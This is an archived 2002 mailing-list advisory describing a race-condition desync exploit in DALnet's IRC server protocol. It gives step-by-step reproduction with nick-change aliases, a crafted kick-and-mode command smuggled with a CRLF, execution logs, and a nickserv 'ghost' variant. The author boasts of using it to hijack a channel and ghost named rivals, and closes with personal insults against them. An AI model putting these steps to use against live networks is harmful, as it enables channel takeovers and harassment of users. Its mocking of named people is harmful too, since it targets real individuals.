=================== WEIRD DALNET SYNC BUG =========================
(my first post! don't bug me if i didn't get it picture perfect)
Author: Enstyne
Contact: irc.cyberarmy.com #cyberarmy
Dates: June 8 2001 -- original document
Feb 9 2002 -- revised for distribution
-----------------------------------------------------
VENDOR STATUS:
I notified the dalnet bahamut crew almost 2 years ago
i was slightly sketchy on info, but as clear as i explained
It they thought i was "just describing lag".
A friend of mine 'llthangel' was there at the time, part
of the unrealircd team. He was also turned away as if it
this was useless info.
Two years is enough time to test/acknowledge a problem, in my opinion.
-----------------------------------------------------
PLEASE NOTE: this exploit has lots of variables, i have
reproduced the effect more than 100 times at many different
occasions, including a few days before this document.
Also note that this is very hard for me to explain in words.
and to get across the idea in my head. Don't ask...
It works and many people are witnesses to it being used
several times.
-----------------------------------------------------
REPRECUSSIONS:
I have reproduced the following effects using this bug:
Invisibility on channels
Invisible Operator Status (kick people while deoped, etc)
Invulnerability to CHANSERV MKICK and CHANSERV DEOP
Complete aquisition of /WHOIS info from the remote party involved
^^^ That means you can kind of hide your host.
-----------------------------------------------------
OVERVIEW:
Asessment: This is (i think) a bug in the TS3 protocol.
Requirements: more Lag in one direction than the other
on two seperate servers. (Don't ask, it happens)
Comments:
This probably works on lots of networks other than dalnet
but dalnet is the one i've tested it on, it seems like a
"race condition" exploit due to the requirement of lag,
it used to give you a few minutes until you see some
movement on the other side it was so bad....
-----------------------------------------------------
DESCRIPTION:
I'll take for this example, two clients and a US and an EU server
that have been connected a long way away from each other, As the lag is
greater over greater distances between servers (generally).
Now, you both join them to a channel...
say,
#ch0wn
then in the channel you have both nicks like
Ens1 and Ens2
Ens1 on US.dal.net
Ens2 on EU.dal.net
------------------------------------
Please note that the messages going from the EU->US server go
faster than the messages going US->EU.
This is a strange(beats me) but vital part of the exploit.
---------------------------
Part 1):
UK Screen:
**** Now talking in #ch0wn
(/nick Enspine | nick halfghost )
*** Ens1 is now known as Enspine
*** Enspine is know known as halfghost
*** Ens2 is know known as Enspine
Part 2):
US Screen:
**** Now talking in #ch0wn
(/nick Enspine)
*** Ens2 is now known as Enspine
(a couple of seconds/minutes later)
*** Ens1 has quit IRC (Killed (EU.dal.net -> (Enspine) US.dal.net)
----------------------------
But, since the person being killed is Enspine on the US side. Which is
does not exist on that side, but on the EU side, the kill path is flawed!
and is therefore rejected on all but the EU server.
The result of all this becomes that the nick "halfghost" on the
US server, does not exist on all parts of the network.
any command that goes through the servers this nick does not exist
on will result in a kill message such as:
*** halfghost has quit IRC (Killed (EU.dal.net -> (halfghost(?)) US.dal.net))
to test this you could use something like:
./whois chanserv == won't kill
./whois EU.dal.net chanserv == will kill
-----------------------------
Now we can build us up a cool packet
like /kick #ch0wn Chawmp . $+ $crlf $+ MODE #ch0wn +inm
this will only happen around locally as all the other servers
will reject the message. Chawmp will not auto-rejoin.
And "halfghost" will get killed by the server.
chawmp is on the EU server by the way.
Every time he speaks he'd get a message
from the desync'd server saying that he's not on channel.
if he rejoins, and doesn't get opped.. then he will also get messages
about the moderated channel, but yet he will see +m is not set!
The funny thing about desyncs is that when you desync something
it can sometimes start to spread more than what you started
say chawmp is opped on #ch0wn but has been "locally kicked" by halfghost
then a guy named "lamer" joins on any server.
If chawmp ops him, he won't be opped on the US server!
therefore now the EU server has it's share of desync's too
especially if "lamer" starts setting channel modes
Also, you may be able to empty a channel of people with the halfghost
and they would never know, then you can join a client onto the US
server and get opped by the server, and not deopped by chanserv
(if your lucky) and would look, on the EU server like your not opped
at all.
-----------------------------
The only aliases i used for the test were: (on mIRC)
/col /nick Enspine
/cob /nick Enspine | /nick Enx435
^^^ lol, if you are using those to test this out i wish you good luck.
-----------------------------
LOGS OF EXPLOIT BEING EXECUTED:
-------------------------------
(from one client's view)
[23:34] <wa1800z> it's a hole bigger then their irc addicted asses but they
dun wanna admit it
[23:34] <Chawmp> Enstyne, do the sploit again! :)
[23:34] <wa1800z> lol
[23:34] <Enstyne> okay, but if i get klined
[23:34] <Chawmp> want whoot :)
[23:34] <Enstyne> it's Chawmp's fault
[23:35] <Enstyne> lol
[23:35] <Chawmp> Enstyne :)
[23:35] <wa1800z> noted
[23:35] <wa1800z> ;)
[23:35] <Chawmp> i'd give you a shell....
[23:35] <Chawmp> but i only g0t 56k :_)
[23:35] <Enstyne> lol
[23:35] <Enstyne> i know
[23:35] <Enstyne> i already have a root shell Chawmp
[23:35] <Enstyne> lol... j/k
[23:36] <Chawmp> lol :)
[23:36] *** Enstyne is now known as Ens|US
[23:36] <Chawmp> heheh
[23:36] *** Ens|US is now known as Enspine
[23:36] *** Enspine is now known as Enstyn
[23:36] <Enstyn> hmmmmmm
[23:36] <Enstyn> seems to have worked
[23:36] <Enstyn> :)
[23:36] <Enstyn> let's check
[23:36] <Chawmp> ooo... that quick?!?!
[23:37] <Enstyn> brb
[23:37] *** Disconnected
Session Close: Tue Oct 31 23:37:18 2000
LOGS OF EXPLOIT BEING EXECUTED:
-------------------------------
(SEPERATE INCIDENT, THIS ONE MAY BE EASIER TO UNDERSTAND)
(server A)
[20:57] *** Enstyne is now known as Enspine
[20:57] *** Enspine is now known as Enstyn
(server B)
[20:57] *** Ens|UKKKkkk is now known as Enspine
(the other chnick to Enspine got through then and killed me)
[20:57] *** Disconnected
(server A)
[20:57] *** Ens|UKKKkkk is now known as Enspine
[20:57] <Enstyn> hmmmmm
[20:57] <Enstyn> how many do you see?
[20:57] <Chawmp> 2 ppl...
[20:57] <Chawmp|UK> 1 person
[20:57] <Chawmp> 2
[20:57] <Chawmp|UK> 1
[20:57] <Enstyn> lol
[20:57] <Enstyn> okay
[20:57] <Enstyn> that worked
[20:58] <Chawmp|UK> !!!
[20:58] -twisted.ma.us.dal.net- *** Notice -- Received KILL message for
jullia^!~banasorat_private From adm Path:
philly!katchoo.vma.verio.net!adm (Stop the mass inviting)
[20:58] <Chawmp|UK> yAY
[20:58] * Enstyn thinks
[20:58] <Enstyn> what do i do next
[20:58] <Enstyn> hmmmmmm
[20:58] <Chawmp|UK> :)
[20:58] <Enstyn> Chawmp: what's the "invisi" persons nick
[20:58] <Enstyn> since i'm "Enstyn"
[20:58] <Chawmp|UK> well
[20:58] <Enstyn> what's the other?
[20:58] <Chawmp|UK> must be enspine then
[20:58] <Enstyn> yep
[20:58] -twisted.ma.us.dal.net- *** Notice -- Received KILL message for
angelia``!~banasorat_private From adm Path:
philly!katchoo.vma.verio.net!adm (Stop the mass inviting)
[20:58] <Chawmp|UK> enspine: No such nick/channel
[20:58] <Enstyn> okay.. join #cyberarmy with chawmp|UK
[20:58] <Chawmp> Enspine (adminat_private) [Unknown]
[20:58] <Chawmp> :)
[20:59] <Chawmp|UK> ok...
[20:59] <Enstyn> then change nick to Enspine
[20:59] <Chawmp|UK> done
[20:59] <Enstyn> exactly
[20:59] *** Chawmp|UK has quit IRC (Killed (netropolis-r.uk.eu.dal.net
(lineone.uk.eu.dal.net(Enspine) <- lineone.uk.eu.dal.net[unknown@localhost])))
[20:59] <Enstyn> your invis!
[20:59] <Enspine> done
[20:59] <Chawmp> !!!!
[20:59] <Chawmp> !!!!!
[20:59] <Chawmp> r00t!
[20:59] <Enstyn> LOl
[20:59] <Enstyn> you are!~!@!
[21:00] <Chawmp> argh
[21:00] <Chawmp> i cant operize
[21:00] <Enstyn> Chawmp: i'll go op you
^^^^ note that in the above he had become invisible to services
well, in a way, because they also thought he wasn't on the
channel he was requesting ops on.
It looked like Chawmp|UK had died but i was just on a server
which got the invisibility effect. "Chawmp|UK" turned
into Enspine afterwards... and kind of brought it back to
life :)
-------------------------------
FINAL NOTES:
I hope at least one person on this mailing list can understand this.
I have also exploited this bug before by using nickserv ghost. (figure it
out, same concept)
ghost the nick on US server, then at the same time, change the nick getting
ghosted by
nickserv to a different nick... if it says 'nick whatever was ghosted' and
the client didn't get
disconnected, then it works..... think of the possibilities :)
---------------------------------------------------------------------------------------
SHOUTS:
Anyone intrested in the matrix && irc... should really take a look at this:
http://cashells.massiveisp.net/~ens/matrixstory.txt
Shouts tew the ch0wn krew! on irc.cyberarmy.com
the people of the ch0wn krew went through extensive confusion as
i developed this exploit, actually even i was pretty confused.
Chawmp - in this case, you wern't confused you were just loving it. lol.
żg0t? is chawmp's trademark.
keoki - for kicking the people i wouldn't dare while invisible under the
effect. lol
wa1800z - you seem way too busy nowadays for *
shad - for telling me to "write it up" instead of trying to explain it
every time. kraft addict
think12 - you seem to have a remarkable tolerance for the weird c**p i do,
unbottle though!
gM - haha, i always forgot to include you before, so you're in now!
(gM knows his irc stuff)
nsh - college life catchin' up on ya? brilliant mind this guy has.
The_Itch- he views the world through cee-debug glasses, irc wizard! (and
has lots of 0days too, so annoy him)
(AND OTHERS TOO) :)
xtra shouts to the #cyberarmy, irc.cyberarmy.com crew
Cass (Weapon of choice, Loki of the attackbots)
Di]v[pLes (taken so much stick and given so much)
matt999 (the Matt that isn't vulnerable to +++ATH0)
darkroot (who sooooo wanted me to give him this info to him first hehe)
blexim (tonnes of testing and messing about. lol)
hellz (we used holodeck irc sim program to msg this guy w/ 12,000 bots)
Quantum_Knight (man, you relieve me of my sanity)
Kaladis (for observing experiments in #cyberarmy with laughter)
(+ OTHERS I FORGOT) it's 2am today and i'm exhausted, bleh :)
w1z - lmao man, that was so funny when we made you receive the wrong whois
info and
turned you invisible so BaDaSSS couldn't do anything. Hahaha.
Chawmp, keoki and I took over DALnet #kkk for a couple of hours with this
(hush hush).
This exploit is dedicated to Douglas Adams, the Shakespeare of our modern
world.
---------------------------------------------------------------------------------------
ANTI-SHOUTS:
BaDaSSS - you are one of the sillyest people i've ever met, you will never
get anywhere unless
you accept things and seek proffesional help.
you cried to me after losing your aop in #cyberarmy and then
nagged llthangel about
it for years afterwards... pssht...
and i thought you "didn't give a *" ... you've had it coming for
a long long time.
p.s. haha, I owned your services and ghosted your ass from your
own network.
Ron885 - Same story except you didn't strike it lucky and get aop in #cyberarmy
You took all the wrong turns man and ended up in lamerville. Also
got ghosted.
script0r - you were okay, but then you turned into an almost hitler-like
domineer.
You still are good natured at heart though. -Ghosted- (only
because you started setpassing)
Wacko/MaxD/MaxDemian/whatever - Wacko(ff) you are so unbelievably blind a
bat would pity you.
"you don't winsock to make a http request, you use INet you
..." (erm, yeah, ok)
like it matters. Most of the people you think like you wacko
don't. Believe me
because they've told me. This guy had to beg for crazyhorse to
stop conconing his
oh-so-elite vb webserver he'd coded up. I wonder if he used
Inet for that aswell :)
---------------------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Thu Feb 14 2002 - 19:58:28 PST